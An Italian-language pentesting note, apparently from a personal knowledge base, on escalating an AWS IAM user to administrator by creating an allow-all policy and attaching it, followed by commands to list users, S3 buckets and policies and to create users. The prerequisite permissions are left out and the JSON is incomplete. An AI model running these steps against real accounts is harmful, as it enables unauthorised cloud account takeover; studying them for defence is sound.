tags: AWS_Cli Cloud_Privilage_Escalation
Quando si ha ottenuto l’accesso all’account AWS, ma si hanno solo privilegi utente è possibile fare una scalata dei privilegi se l’account è malconfigurato, un esempio potrebbe essere quello di un utente che possiede questi permessi:
Che permettono di ottenere i privilegi di amministratore.
FIle .JSON
Per prima cosa dobbiamo crearci un file .JSON con il seguente contenuto:
"Version":"2012-10-17",
"Statement": [
"Effect":"Allow",
"Action":"*",
"Resource":"*"
}
]Modifica della politica dell’utente
Ora allegheremo la politica creata (politica utente) all’account dell’utente IAM di destinazione tramite il seguente comando:
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json
Adesso possiamo allegare la politica utente all’account user IAM in nostro possesso con il seguente comando:
aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy
Tramite il seguente comando possiamo vedere le user-policy dell’utente:
aws iam list-attached-user-policies --user-name [Target Username]
Ora che abbiamo ottenuto i privilegi di amministratore possiamo listare tutti gli utenti con il seguente comando:
aws iam list-users
Altri comandi utili
Comando per listare i Bucket S3:
aws s3api list-buckets --query "Buckets[].Name"Comando per listare le user-policy:
aws iam list-user-policiesComando per listare i ruoli delle policy:
aws iam list-role-policiesComando per listare i le policy dei gruppi:
aws iam list-group-policiesComando per creare un utente:
aws iam create-user